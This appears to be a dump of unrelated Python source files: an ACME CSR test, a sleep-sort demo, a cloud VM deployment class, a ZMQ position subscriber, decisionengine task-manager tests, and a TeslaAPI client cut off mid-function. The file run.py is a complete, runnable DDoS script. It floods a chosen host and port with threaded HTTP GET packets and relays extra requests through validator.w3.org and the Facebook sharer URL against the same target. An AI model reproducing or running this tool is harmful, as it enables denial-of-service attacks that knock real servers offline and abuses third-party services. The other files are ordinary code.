cert = gen_ss_cert(self.key, ['dummy'], force_san=True)
self.serial_num.append(cert.get_serial_number())
self.assertTrue(len(set(self.serial_num)) > 1)
class MakeCSRTest(unittest.TestCase):
"""Test for standalone functions."""
@classmethod
def _call_with_key(cls, *args, **kwargs):
privkey = OpenSSL.crypto.PKey()
privkey.generate_key(OpenSSL.crypto.TYPE_RSA, 2048)
privkey_pem = OpenSSL.crypto.dump_privatekey(OpenSSL.crypto.FILETYPE_PEM, privkey)
from acme.crypto_util import make_csr
return make_csr(privkey_pem, *args, **kwargs)
def test_make_csr(self):
csr_pem = self._call_with_key(["a.example", "b.example"])
self.assertTrue(b'--BEGIN CERTIFICATE REQUEST--' in csr_pem)
self.assertTrue(b'--END CERTIFICATE REQUEST--' in csr_pem)
csr = OpenSSL.crypto.load_certificate_request(
OpenSSL.crypto.FILETYPE_PEM, csr_pem)
# In pyopenssl 0.13 (used with TOXENV=py26-oldest and py27-oldest), csr
# objects don't have a get_extensions() method, so we skip this test if
# the method isn't available.
if hasattr(csr, 'get_extensions'):
self.assertEqual(len(csr.get_extensions()), 1)
self.assertEqual(csr.get_extensions()[0].get_data(),
OpenSSL.crypto.X509Extension(
b'subjectAltName',
critical=False,
value=b'DNS:a.example, DNS:b.example',
).get_data(),
)
def test_make_csr_must_staple(self):
csr_pem = self._call_with_key(["a.example"], must_staple=True)
csr = OpenSSL.crypto.load_certificate_request(
OpenSSL.crypto.FILETYPE_PEM, csr_pem)
# In pyopenssl 0.13 (used with TOXENV=py26-oldest and py27-oldest), csr
# objects don't have a get_extensions() method, so we skip this test if
# the method isn't available.
if hasattr(csr, 'get_extensions'):
self.assertEqual(len(csr.get_extensions()), 2)
# NOTE: Ideally we would filter by the TLS Feature OID, but
# OpenSSL.crypto.X509Extension doesn't give us the extension's raw OID,
# and the shortname field is just "UNDEF"
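# b"0\x03\x02\x01\x05" is the DER-encoded TLS Feature extension value:
# SEQUENCE { INTEGER 5 }, i.e. status_request (OCSP Must-Staple).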
must_staple_exts = [e for e in csr.get_extensions()
if e.get_data() == b"0\x03\x02\x01\x05"]
self.assertEqual(len(must_staple_exts), 1,
"Expected exactly one Must Staple extension")
if __name__ == '__main__':
unittest.main() # pragma: no cover
|
sleep_sort.py
|
import sys
import threading
from time import sleep
def arg_to_list(string):
return [int(x.strip(" "), 10) for x in string.split(',')]
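# "Sleep sort": each value gets its own thread that sleeps for value seconds
# and then appends the value to the shared output list, so smaller numbers
# finish first and the list ends up sorted. list.append is atomic under
# CPython's GIL, which keeps the shared list safe without an explicit lock.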
def sleep_sort(i, output):
sleep(i)
output.append(i)
def error_and_exit():
print('Usage: please provide a list of at least two integers to sort in the format "1, 2, 3, 4, 5"')
sys.exit()
def main():
if len(sys.argv) == 1 or not sys.argv[1] or len(sys.argv[1].split(",")) == 1:
error_and_exit()
array = arg_to_list(sys.argv[1])
threads = []
output = []
for i in array:
arg_tuple = (i, output)
thread = threading.Thread(target=sleep_sort, args=arg_tuple)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
print(output)
if __name__ == "__main__":
    main()
|
run.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# python 3.3.2+ Indonesian Dos Script v.1
# by Can Yalçın
# only for legal purpose
from queue import Queue
from optparse import OptionParser
import time,sys,socket,threading,logging,urllib.request,random
import os
R = "\033[91;1m"
G = "\033[92;1m"
Y = "\033[93;1m"
B = "\033[94;1m"
P = "\033[95;1m"
A = "\033[96;1m"
W = "\033[90;1m"
WL = "\033[0;1m"
def user_agent():
global uagent
uagent=[]
uagent.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0")
uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1")
return(uagent)
def my_bots():
global bots
bots=[]
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
return(bots)
def noobs(url):
try:
while True:
req = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent': random.choice(uagent)}))
print(R+"[+]\033[95m Bot Sedang Menembak ",R+"==>----\033[0m")
time.sleep(.1)
except:
time.sleep(.1)
def down_it(item):
try:
while True:
packet = str("GET / HTTP/1.1\nHost: "+host+"\n\n User-Agent: "+random.choice(uagent)+"\n"+data).encode('utf-8')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
if s.sendto( packet, (host, int(port)) ):
s.shutdown(1)
print ("\033[90;1m[+] Indonesian Cyber\033[0m \033[90m [+]",B+"Mengirim paket ddos.. ^_^ \033[0m")
else:
s.shutdown(1)
print("\033[91m[+] server down bos... ^_^\033[0m")
time.sleep(0)
except socket.error as e:
print("\033[91m[?] tidak ada koneksi! server mungkin down\033[0m")
#print("\033[91m",e,"\033[0m")
time.sleep(0)
def dos():
while True:
item = q.get()
down_it(item)
q.task_done()
def dos2():
while True:
item=w.get()
noobs(random.choice(bots)+"http://"+host)
w.task_done()
def usage():
print ('''\033[91;1m \033[90;1mTHANKS TO: Can Yalcin \033[0;1m
|`\ |`| ___ ___ |`|__ ___.
| \| |/ _ \ / _ \| '_ \/ __||
| |\ | (_) | (_) | |_) \__ \\ Life Of
|_| \_|\___/ \___/|_.__/|___// Programmer
''',W+'''+---------------------------------------+
\033[92m [+]\033[96m Cara menggunakan :
python3 ddos.py -s target -p 80 -t 135
''',W+'''+---------------------------------------+
''',G+'''[-h]''',W+'''=>''',P+'''bantuan ''',W+''' | DDOS Attack
''',G+'''[-s]''',W+'''=>''',P+'''ip target ''',W+''' |______________
''',G+'''[-p]''',W+'''=>''',P+'''nilai port 80 ''',W+'''| Mod by:
''',G+'''[-t]''',W+'''=>''',P+'''nilai turbo 135''',W+'''|pace usa gans
''',W+'''+---------------------------------------+''',R+''' ''')
sys.exit()
def get_parameters():
global host
global port
global thr
global item
optp = OptionParser(add_help_option=False,epilog="Hammers")
optp.add_option("-q","--quiet", help="set logging to ERROR",action="store_const", dest="loglevel",const=logging.ERROR, default=logging.INFO)
optp.add_option("-s","--server", dest="host",help="attack to server ip -s ip")
optp.add_option("-p","--port",type="int",dest="port",help="-p 80 default 80")
optp.add_option("-t","--turbo",type="int",dest="turbo",help="default 135 -t 135")
optp.add_option("-h","--help",dest="help",action='store_true',help="help you")
opts, args = optp.parse_args()
logging.basicConfig(level=opts.loglevel,format='%(levelname)-8s %(message)s')
if opts.help:
usage()
if opts.host is not None:
host = opts.host
else:
usage()
if opts.port is None:
port = 80
else:
port = opts.port
if opts.turbo is None:
thr = 135
else:
thr = opts.turbo
# reading headers
global data
headers = open("headers.txt", "r")
data = headers.read()
headers.close()
#task queue are q,w
q = Queue()
w = Queue()
if __name__ == '__main__':
if len(sys.argv) < 2:
usage()
get_parameters()
print(G+" IP","\033[94m",host,G+" port: ",B+str(port),G+" turbo: ",B+str(thr),"\033[0m")
print("\033[90;1m Tunggu boss",WL+".........",P+"Klo Kuotanya abis jangan nangis ya... :v\033[0m")
user_agent()
my_bots()
time.sleep(3)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
s.settimeout(1)
except socket.error as e:
print("\033[91mcek ip target dan port Boss... !\033[0m")
usage()
while True:
for i in range(int(thr)):
t = threading.Thread(target=dos)
t.daemon = True # if thread is exist, it dies
t.start()
t2 = threading.Thread(target=dos2)
t2.daemon = True # if thread is exist, it dies
t2.start()
start = time.time()
#tasking
item = 0
while True:
if (item>1800): # for no memory crash
item=0
time.sleep(.1)
item = item + 1
q.put(item)
w.put(item)
q.join()
w.join()
|
deployment.py
|
import logging
from threading import Thread
from deployer.components.vmgroup import VMGroup
from deployer.errors import ArgumentsError
from deployer.utils import generate_ssh_key_pair, get_random_file_name
__author__ = 'Giannis Giannakopoulos'
class Deployment:
"""
This class represents a deployment entity. It holds a number of VMGroups and
it is responsible for the allocation and the orchestration of the cloud resources.
"""
def __init__(self):
self.inject_ssh_key_pair = True
self.update_hosts = True
self.set_hostnames = True
self.__vm_groups = list()
self.cloud_connector = None
self.name = ''
self.private_network = -1
def configure(self, description):
"""
This method configures new VMGroup objects according to the received description.
:param description: dict describing the deployment (keys: name, actions, groups)
:return: None
"""
if self.cloud_connector is None:
raise ArgumentsError("Connector must be set!")
self.name = description['name']
if 'inject_ssh_keypair' in description['actions']:
self.inject_ssh_key_pair = description['actions']['inject_ssh_keypair']
if 'update_etc_hosts' in description['actions']:
self.update_hosts = description['actions']['update_etc_hosts']
if 'set_hostnames' in description['actions']:
self.set_hostnames = description['actions']['set_hostnames']
for group in description['groups']:
g = VMGroup()
g.configure(group)
g.cloud_connector = self.cloud_connector.clone()
for ability, value in group['provider_actions'].iteritems():
setattr(g.cloud_connector, ability, value)
self.__vm_groups.append(g)
def launch(self):
logging.getLogger("deployment").info("Starting deployment")
self.__spawn_threads('create')
logging.getLogger("deployment").info("VMs visible -- construcing and injecting key pairs")
if self.inject_ssh_key_pair:
keys = generate_ssh_key_pair(keys_prefix=get_random_file_name())
self.__spawn_threads('inject_ssh_key', args=[keys['private'], keys['public']])
if self.update_hosts:
logging.getLogger("deployment").info("Ok -- setting /etc/hosts files")
hosts = dict()
for vmg in self.__vm_groups:
for ip, host in vmg.get_addresses().iteritems():
hosts[ip] = host
for vmg in self.__vm_groups:
vmg.set_hosts(hosts)
if self.set_hostnames:
logging.getLogger("deployment").info("Setting hostnames")
self.__spawn_threads('set_hostnames')
def execute_script(self):
self.__spawn_threads('execute_script')
def has_more_steps(self):
for g in self.__vm_groups:
if g.has_more_scripts():
return True
return False
def terminate(self):
self.__spawn_threads('delete')
self.cloud_connector.cleanup()
def __spawn_threads(self, method_to_call, args=None):
"""
Run method_to_call on every VM group in its own thread and wait for all threads to finish.

:param method_to_call: name of the VMGroup method to invoke on each group
:param args: optional list of positional arguments passed to each call
"""
threads = []
for vm in self.__vm_groups:
if args is None:
t = Thread(target=getattr(vm, method_to_call))
else:
t = Thread(target=getattr(vm, method_to_call), args=args)
t.start()
threads.append(t)
for t in threads:
t.join()
def serialize(self):
d = dict()
d['name'] = self.name
d['groups'] = list()
d['connector'] = self.cloud_connector.serialize()
for g in self.__vm_groups:
d['groups'].append(g.serialize())
return d
def deserialize(self, state, cloud_connector):
self.cloud_connector = cloud_connector
for key, value in state['connector'].iteritems():
setattr(self.cloud_connector, key, value)
self.name = state['name']
for group_state in state['groups']:
group = VMGroup()
group.deserialize(group_state, cloud_connector.clone())
self.__vm_groups.append(group)
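# --- Hedged usage sketch (not part of the original module) -----------------
# Shows the expected call order on a Deployment. Both arguments are
# hypothetical here: `connector` must be a cloud connector exposing clone(),
# cleanup() and serialize(), and `description` the dict layout expected by
# configure() (keys: name, actions, groups).
def _example_deployment_run(connector, description):
    deployment = Deployment()
    deployment.cloud_connector = connector
    deployment.configure(description)
    deployment.launch()
    while deployment.has_more_steps():
        deployment.execute_script()
    deployment.terminate()
    return deployment.serialize()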
|
positionZMQSub.py
|
'''
All components of this library are licensed under the BSD 3-Clause
License.
Copyright (c) 2015-, Algorithmic Robotics and Control Group @Rutgers
(http://arc.cs.rutgers.edu). All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer. Redistributions
in binary form must reproduce the above copyright notice, this list of
conditions and the following disclaimer in the documentation and/or
other materials provided with the distribution. Neither the name of
Rutgers University nor the names of the contributors may be used to
endorse or promote products derived from this software without specific
prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys
import zmq
import time
import threading
from threading import Thread
import copy
import utils
# Dictionary mapping car ID -> most recent position payload string
carPosiDict = dict()
# Create a threading lock for safe access to dictionary
lock = threading.Lock()
def _pull_zmq_data():
#Connect to zmq publisher
context = zmq.Context()
socket = context.socket(zmq.SUB)
print "Collecting update from server: tcp://%s:%s" \
%(utils.zmqPublisherIP, utils.zmqPublisherPort)
socket.connect ("tcp://%s:%s" %(utils.zmqPublisherIP,
utils.zmqPublisherPort))
print "Connected..."
socket.setsockopt(zmq.SUBSCRIBE, "")
#Continuous update of car position, if available
while True:
string = socket.recv()
firstSpaceAt = 1
while string[firstSpaceAt] != " ":
firstSpaceAt += 1
carID, rest = string[:firstSpaceAt], string[(firstSpaceAt + 1):]
with lock:
carPosiDict[int(carID)] = rest
def _get_all_car_position_data():
with lock:
tempData = copy.deepcopy(carPosiDict)
return tempData
def _get_car_position_data(carID):
tempData = ""
with lock:
if carID in carPosiDict:
tempData = carPosiDict[carID]
return tempData
t = Thread(target = _pull_zmq_data)
t.setDaemon(True)
def _initialize_zmq():
t.start()
time.sleep(0.3)
def _stop_zmq():
return
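# --- Hedged usage sketch (not part of the original module) -----------------
# Starts the background SUB thread and polls the shared dictionary. Assumes a
# ZMQ publisher is reachable at utils.zmqPublisherIP:utils.zmqPublisherPort.
if __name__ == "__main__":
    _initialize_zmq()
    for _ in range(10):
        print _get_all_car_position_data()
        time.sleep(1)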
|
test_task_manager.py
|
# SPDX-FileCopyrightText: 2017 Fermi Research Alliance, LLC
# SPDX-License-Identifier: Apache-2.0
import os
import threading
from unittest.mock import patch
import pytest
import decisionengine.framework.config.policies as policies
from decisionengine.framework.config.ValidConfig import ValidConfig
from decisionengine.framework.dataspace import datablock
from decisionengine.framework.taskmanager.TaskManager import State, TaskManager
from decisionengine.framework.taskmanager.tests.fixtures import ( # noqa: F401
DATABASES_TO_TEST,
dataspace,
PG_DE_DB_WITHOUT_SCHEMA,
PG_PROG,
SQLALCHEMY_PG_WITH_SCHEMA,
SQLALCHEMY_TEMPFILE_SQLITE,
)
_CWD = os.path.dirname(os.path.abspath(__file__))
_CONFIG_PATH = os.path.join(_CWD, "../../tests/etc/decisionengine")
_CHANNEL_CONFIG_DIR = os.path.join(_CWD, "channels")
_TEST_CHANNEL_NAMES = [
"test_channel",
]
_TEST_CHANNEL_NAMES2 = [
"test_channel2",
]
class RunChannel:
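# Context-manager helper: runs the TaskManager in a named thread, waits until
# it has left the BOOT state before yielding it, and joins the thread on a
# clean exit (an exception in the body propagates without joining).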
def __init__(self, global_config, channel):
self._tm = TaskManager(channel, get_channel_config(channel), global_config)
self._thread = threading.Thread(name=channel, target=self._tm.run)
def __enter__(self):
self._thread.start()
self._tm.state.wait_while(State.BOOT)
return self._tm
def __exit__(self, type, value, traceback):
if type:
return False
self._thread.join()
def get_channel_config(name):
return ValidConfig(os.path.join(_CHANNEL_CONFIG_DIR, name + ".jsonnet"))
@pytest.fixture()
@pytest.mark.usefixtures("dataspace")
def global_config(dataspace): # noqa: F811
conf = ValidConfig(policies.global_config_file(_CONFIG_PATH))
conf["dataspace"] = dataspace.config["dataspace"]
yield conf
@pytest.mark.usefixtures("global_config")
def test_taskmanager_init(global_config):
for channel in _TEST_CHANNEL_NAMES:
task_manager = TaskManager(channel, get_channel_config(channel), global_config)
assert task_manager.state.has_value(State.BOOT)
@pytest.mark.usefixtures("global_config")
def test_taskmanager_channel_name_in_config(global_config):
for channel in _TEST_CHANNEL_NAMES2:
task_manager = TaskManager(channel, get_channel_config(channel), global_config)
assert task_manager.name == "name_in_config"
@pytest.mark.usefixtures("global_config")
def test_set_to_shutdown(global_config):
for channel in _TEST_CHANNEL_NAMES:
with RunChannel(global_config, channel) as task_manager:
m = "decisionengine.framework.tests.PublisherNOP.PublisherNOP.shutdown"
with patch(m) as mocked_shutdown:
task_manager.set_to_shutdown()
mocked_shutdown.assert_called()
assert task_manager.state.has_value(State.SHUTDOWN)
@pytest.mark.usefixtures("global_config")
def test_take_task_manager_offline(global_config):
for channel in _TEST_CHANNEL_NAMES:
with RunChannel(global_config, channel) as task_manager:
task_manager.take_offline()
assert task_manager.state.has_value(State.OFFLINE)
assert task_manager.get_state_value() == State.OFFLINE.value
@pytest.mark.usefixtures("global_config")
def test_failing_publisher(global_config):
task_manager = TaskManager("failing_publisher", get_channel_config("failing_publisher"), global_config)
task_manager.run()
assert task_manager.state.has_value(State.OFFLINE)
@pytest.mark.usefixtures("global_config", "dataspace")
def test_bad_datablock(global_config, dataspace, caplog): # noqa: F811
for channel in _TEST_CHANNEL_NAMES:
with RunChannel(global_config, channel) as task_manager:
dblock = datablock.DataBlock(dataspace, channel)
task_manager.data_block_put("bad_string", "header", dblock)
task_manager.take_offline()
assert "data_block put expecting" in caplog.text
@pytest.mark.usefixtures("global_config")
def test_no_data_to_transform(global_config):
for channel in _TEST_CHANNEL_NAMES:
with RunChannel(global_config, channel) as task_manager:
task_manager.run_transforms()
with pytest.raises(RuntimeError, match="Cannot run logic engine on data block that is 'None'."):
task_manager.run_logic_engine(None)
task_manager.take_offline()
@pytest.mark.usefixtures("global_config")
def test_run_source_only_once(global_config):
with RunChannel(global_config, "run_source_once") as task_manager:
task_manager.take_offline()
@pytest.mark.usefixtures("global_config")
def test_multiple_logic_engines_not_supported(global_config):
with pytest.raises(RuntimeError, match="Cannot support more than one logic engine per channel."):
channel = "multiple_logic_engines"
TaskManager(channel, get_channel_config(channel), global_config)
|
TeslaAPI.py
|
import base64
import hashlib
import json
import logging
import os
import re
import requests
from threading import Thread
import time
from urllib.parse import parse_qs
from ww import f
logger = logging.getLogger("\U0001F697 TeslaAPI")
class TeslaAPI:
__apiCaptcha = None
__apiCaptchaCode = None
__apiCaptchaInterface = None
__authURL = "https://auth.tesla.com/oauth2/v3/authorize"
callbackURL = "https://auth.tesla.com/void/callback"
captchaURL = "https://auth.tesla.com/captcha"
carApiLastErrorTime = 0
carApiBearerToken = ""
carApiRefreshToken = ""
carApiTokenExpireTime = time.time()
carApiLastStartOrStopChargeTime = 0
carApiLastChargeLimitApplyTime = 0
clientID = "81527cff06843c8634fdc09e8ac0abefb46ac849f38fe1e431c2ef2106796384"
clientSecret = "c7257eb71a564034f9419ee651c7d0e5f7aa6bfbd18bafb5c5c033b093bb2fa3"
lastChargeLimitApplied = 0
lastChargeCheck = 0
chargeUpdateInterval = 1800
carApiVehicles = []
config = None
master = None
__email = None
errorCount = 0
maxLoginRetries = 10
minChargeLevel = -1
params = None
__password = None
refreshURL = "https://owner-api.teslamotors.com/oauth/token"
__resp = None
session = None
verifier = ""
# Transient errors are ones that usually disappear if we retry the car API
# command a minute or less later.
# 'vehicle unavailable:' sounds like it implies the car is out of connection
# range, but I once saw it returned by drive_state after wake_up returned
# 'online'. In that case, the car is reachable, but drive_state failed for some
# reason. Thus we consider it a transient error.
# Error strings below need only match the start of an error response such as:
# {'response': None, 'error_description': '',
# 'error': 'operation_timedout for txid `4853e3ad74de12733f8cc957c9f60040`}'}
carApiTransientErrors = [
"upstream internal error",
"operation_timedout",
"vehicle unavailable",
]
def __init__(self, master):
self.master = master
try:
self.config = master.config
self.minChargeLevel = self.config["config"].get("minChargeLevel", -1)
self.chargeUpdateInterval = self.config["config"].get(
"cloudUpdateInterval", 1800
)
except KeyError:
pass
def addVehicle(self, json):
self.carApiVehicles.append(CarApiVehicle(json, self, self.config))
return True
def apiDebugInterface(self, command, vehicleID, parameters):
# Provides an interface from the Web UI to allow commands to be run interactively
# Map vehicle ID back to vehicle object
vehicle = self.getVehicleByID(int(vehicleID))
# Get parameters
params = {}
try:
params = json.loads(parameters)
except json.decoder.JSONDecodeError:
pass
# Execute specified command
if command == "setChargeRate":
charge_rate = params.get("charge_rate", 0)
self.setChargeRate(charge_rate, vehicle)
return True
elif command == "wakeVehicle":
self.wakeVehicle(vehicle)
return True
# If we make it here, we did not execute a command
return False
def apiLogin(self, email, password):
# Populate auth details for Phase 1
self.__email = email
self.__password = password
for attempt in range(self.maxLoginRetries):
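# PKCE (RFC 7636): generate a random code_verifier; its SHA-256 digest,
# base64url-encoded without padding, is sent as the code_challenge. The raw
# verifier is only revealed later, in apiLoginPhaseTwo, when exchanging the
# authorization code for tokens.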
self.verifier = base64.urlsafe_b64encode(os.urandom(86)).rstrip(b"=")
challenge = base64.urlsafe_b64encode(
hashlib.sha256(self.verifier).digest()
).rstrip(b"=")
state = (
base64.urlsafe_b64encode(os.urandom(16)).rstrip(b"=").decode("utf-8")
)
self.params = (
("client_id", "ownerapi"),
("code_challenge", challenge),
("code_challenge_method", "S256"),
("redirect_uri", self.callbackURL),
("response_type", "code"),
("scope", "openid email offline_access"),
("state", state),
)
self.session = requests.Session()
self.__resp = self.session.get(self.__authURL, params=self.params)
if self.__resp.ok and "<title>" in self.__resp.text:
logger.log(
logging.INFO6,
"Tesla Auth form fetch success, attempt: " + str(attempt),
)
if 'img data-id="captcha"' in self.__resp.text:
logger.log(
logging.INFO6,
"Tesla Auth form challenged us for Captcha. Redirecting.",
)
self.getApiCaptcha()
return "Phase1Captcha"
elif "g-recaptcha" in self.__resp.text:
logger.log(
logging.INFO6,
"Tesla Auth form challenged us for Google Recaptcha. Redirecting.",
)
return "Phase1Recaptcha"
else:
return self.apiLoginPhaseOne()
else:
logger.log(
logging.INFO6,
"Tesla auth form fetch failed, attempt: " + str(attempt),
)
time.sleep(3)
else:
logger.log(
logging.INFO2,
"Wasn't able to find authentication form after "
+ str(attempt)
+ " attempts",
)
return "Phase1Error"
def apiLoginPhaseOne(self):
# Picks up on the first phase of authentication, after redirecting to
# handle Captcha if this was requested, or directly if we were lucky
# enough not to be challenged.
csrf_match = re.search(r'name="_csrf".+value="([^"]+)"', self.__resp.text)
transaction_id_match = re.search(
r'name="transaction_id".+value="([^"]+)"', self.__resp.text
)
if not csrf_match or not transaction_id_match:
# These two parameters are required for Phase 1 (Authentication) auth
# If they are missing, return an appropriate error to the user's attention
return "Phase1Error"
csrf = csrf_match.group(1)
transaction_id = transaction_id_match.group(1)
data = {
"_csrf": csrf,
"_phase": "authenticate",
"_process": "1",
"transaction_id": transaction_id,
"cancel": "",
"identity": self.__email,
"credential": self.__password,
}
# If a captcha code is stored, inject it into the data parameter
if self.__apiCaptchaCode and self.__apiCaptchaInterface == "captcha":
data["captcha"] = self.__apiCaptchaCode
# Clear captcha data
self.__apiCaptcha = None
elif self.__apiCaptchaCode and self.__apiCaptchaInterface == "recaptcha":
data["recaptcha"] = self.__apiCaptchaCode
data["g-recaptcha-response"] = self.__apiCaptchaCode
# Clear stored credentials
self.__email = None
self.__password = None
# Call login Phase 2
return self.apiLoginPhaseTwo(data)
def apiLoginPhaseTwo(self, data):
for attempt in range(self.maxLoginRetries):
resp = self.session.post(
self.__authURL, params=self.params, data=data, allow_redirects=False
)
if resp.ok and (resp.status_code == 302 or "<title>" in resp.text):
logger.log(
logging.INFO2,
"Posted auth form successfully after " + str(attempt) + " attempts",
)
break
time.sleep(3)
else:
logger.log(
logging.INFO2,
"Wasn't able to post authentication form after "
+ str(attempt)
+ " attempts",
)
return "Phase2Error"
if resp.status_code == 200 and "/mfa/verify" in resp.text:
# This account is using MFA, redirect to MFA code entry page
return "MFA/" + str(data["transaction_id"])
try:
code = parse_qs(resp.headers["location"])[self.callbackURL + "?code"]
except KeyError:
return "Phase2ErrorTip"
data = {
"grant_type": "authorization_code",
"client_id": "ownerapi",
"code_verifier": self.verifier.decode("utf-8"),
"code": code,
"redirect_uri": self.callbackURL,
}
resp = self.session.post("https://auth.tesla.com/oauth2/v3/token", json=data)
access_token = resp.json()["access_token"]
headers = {"authorization": "bearer " + access_token}
data = {
"grant_type": "urn:ietf:params:oauth:grant-type:jwt-bearer",
"client_id": self.clientID,
}
resp = self.session.post(
"https://owner-api.teslamotors.com/oauth/token", headers=headers, json=data
)
try:
self.setCarApiBearerToken(resp.json()["access_token"])
self.setCarApiRefreshToken(resp.json()["refresh_token"])
self.setCarApiTokenExpireTime(time.time() + resp.json()["expires_in"])
self.master.queue_background_task({"cmd": "saveSettings"})
return True
except KeyError:
logger.log(
logging.INFO2,
"ERROR: Can't access Tesla car via API. Please log in again via web interface.",
)
self.updateCarApiLastErrorTime()
# In addition to setting carApiLastErrorTime, erase tokens to
# prevent further authorization attempts until user enters password
# on web interface. I feel this is safer than trying to log in every
# ten minutes with a bad token because Tesla might decide to block
# remote access to your car after too many authorization errors.
self.setCarApiBearerToken("")
self.setCarApiRefreshToken("")
self.master.queue_background_task({"cmd": "saveSettings"})
return False
def apiRefresh(self):
# Refresh tokens expire 45 days after they are first issued,
# so we'll get a new token every 15 days.
headers = {"accept": "application/json", "Content-Type": "application/json"}
data = {
"client_id": self.clientID,
"client_secret": self.clientSecret,
"grant_type": "refresh_token",
"refresh_token": self.getCarApiRefreshToken(),
}
req = None
apiResponseDict = {}
now = time.time()
try:
req = requests.post(self.refreshURL, headers=headers, json=data)
logger.log(logging.INFO2, "Car API request" + str(req))
apiResponseDict = json.loads(req.text)
except requests.exceptions.RequestException:
pass
except ValueError:
pass
except json.decoder.JSONDecodeError:
pass
try:
logger.log(logging.INFO4, "Car API auth response" + str(apiResponseDict))
self.setCarApiBearerToken(apiResponseDict["access_token"])
self.setCarApiRefreshToken(apiResponseDict["refresh_token"])
self.setCarApiTokenExpireTime(now + apiResponseDict["expires_in"])
self.master.queue_background_task({"cmd": "saveSettings"})
except KeyError:
logger.log(
logging.INFO2,
"TeslaAPI",
"ERROR: Can't access Tesla car via API. Please log in again via web interface.",
)
self.updateCarApiLastErrorTime()
# Instead of just setting carApiLastErrorTime, erase tokens to
# prevent further authorization attempts until user enters password
# on web interface. I feel this is safer than trying to log in every
# ten minutes with a bad token because Tesla might decide to block
# remote access to your car after too many authorization errors.
self.setCarApiBearerToken("")
self.setCarApiRefreshToken("")
self.master.queue_background_task({"cmd": "saveSettings"})
def car_api_available(
self, email=None, password=None, charge=None, applyLimit=None
):
now = time.time()
needSleep = False
apiResponseDict = {}
if self.getCarApiRetryRemaining():
# It's been under carApiErrorRetryMins minutes since the car API
# generated an error. To keep strain off Tesla's API servers, wait
# carApiErrorRetryMins mins till we try again. This delay could be
# reduced if you feel the need. It's mostly here to deal with unexpected
# errors that are hopefully transient.
# https://teslamotorsclub.com/tmc/threads/model-s-rest-api.13410/page-114#post-2732052
# says he tested hammering the servers with requests as fast as possible
# and was automatically blacklisted after 2 minutes. Waiting 30 mins was
# enough to clear the blacklist. So at this point it seems Tesla has
# accepted that third party apps use the API and deals with bad behavior
# automatically.
logger.log(
logging.INFO6,
"Car API disabled for "
+ str(self.getCarApiRetryRemaining())
+ " more seconds due to recent error.",
)
return False
else:
logger.log(
logging.INFO8,
"Entering car_api_available - next step is to query Tesla API",
)
# Authenticate to Tesla API
if not self.master.tokenSyncEnabled() and (
self.getCarApiBearerToken() == ""
or self.getCarApiTokenExpireTime() - now < 30 * 24 * 60 * 60
):
if self.getCarApiRefreshToken() != "":
headers = {
"accept": "application/json",
"Content-Type": "application/json",
}
data = {
"client_id": self.clientID,
"client_secret": self.clientSecret,
"grant_type": "refresh_token",
"refresh_token": self.getCarApiRefreshToken(),
}
logger.log(logging.INFO8, "Attempting token refresh")
self.apiRefresh()
elif email is not None and password is not None:
logger.log(logging.INFO8, "Attempting password auth")
ret = self.apiLogin(email, password)
# If any string is returned, we redirect to it. This helps with MFA login flow
if (
str(ret) != "True"
and str(ret) != "False"
and str(ret) != ""
and str(ret) != "None"
):
return ret
if self.master.tokenSyncEnabled():
tmv = self.master.getModuleByName("TeslaMateVehicle")
logger.log(logging.INFO8, "Jah we gant eki testen eni")
if (now - tmv.lastSync) > 60*60:
tmv.doSyncTokens()
if self.getCarApiBearerToken() != "":
if self.getVehicleCount() < 1:
url = "https://owner-api.teslamotors.com/api/1/vehicles"
logger.log(logging.INFO8, "using token: " + str(self.getCarApiBearerToken()))
headers = {
"accept": "application/json",
"Authorization": "Bearer " + self.getCarApiBearerToken(),
}
try:
req = requests.get(url, headers=headers)
logger.log(logging.INFO8, "Car API cmd vehicles " + str(req))
apiResponseDict = json.loads(req.text)
except requests.exceptions.RequestException:
logger.info("Failed to make API call " + url)
logger.log(logging.INFO6, "Response: " + req.text)
pass
except json.decoder.JSONDecodeError:
logger.info("Could not parse JSON result from " + url)
logger.log(logging.INFO6, "Response: " + req.text)
pass
try:
